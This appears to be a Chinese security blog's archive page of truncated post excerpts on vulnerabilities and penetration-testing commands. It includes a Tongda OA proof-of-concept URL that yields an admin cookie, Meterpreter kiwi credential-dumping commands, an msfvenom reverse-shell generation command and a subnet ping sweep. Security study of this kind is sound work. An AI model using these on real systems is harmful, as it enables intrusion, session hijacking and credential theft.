03 2021 档案
摘要:描述 这个漏洞的根本问题是一个druid中全局性的问题,开发者在使用Jackson相关的标签时,出现疏漏,使得攻击者可以构造传入的json串来控制一些敏感的参数。 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apac
阅读全文
摘要:漏洞描述 该漏洞的产生是由于两方面的原因: 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。 Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.l
阅读全文
摘要:描述 访问http://xx.xx.x.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0链接后即可获得管理员cookie,直接访问/general/目录进入后台即可 漏洞利用条件 管理员在线 POC http://xx.xx.x.xx/mobile/a
阅读全文
摘要:192.168.1.0/24网段 for /l %i in (1,1,255) do @ ping 192.168.1.%i -w 1 -n 1 | find /i "ttl="
阅读全文
摘要:meterpreter kiwi命令大全 显示帮助信息 help kiwi creds_all:列举所有凭据 creds_kerberos:列举所有kerberos凭据 creds_msv:列举所有msv凭据 creds_ssp:列举所有ssp凭据 creds_tspkg:列举所有tspkg凭据 c
阅读全文
摘要:9月11日-9月23日漏洞(来自补天) 1.深信服EDR某处命令执行漏洞,危害级别:危急 2.深信服SSL VPN 远程代码执行漏洞,危害级别:危急 3.绿盟UTS综合威胁探针信息泄露漏洞,危害级别:危急,官方已发布补丁 4.Apache DolphinScheduler远程代码执行漏洞(CVE-2
阅读全文
摘要:查看程序对应的进程号: ps -ef | grep 进程名字 查看端口号所占用的进程: netstat -nltp | grep 端口 或者 netstat -anp | grep 端口 杀死进程 kill pid
阅读全文
摘要:生成不同类型的shell Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows
阅读全文
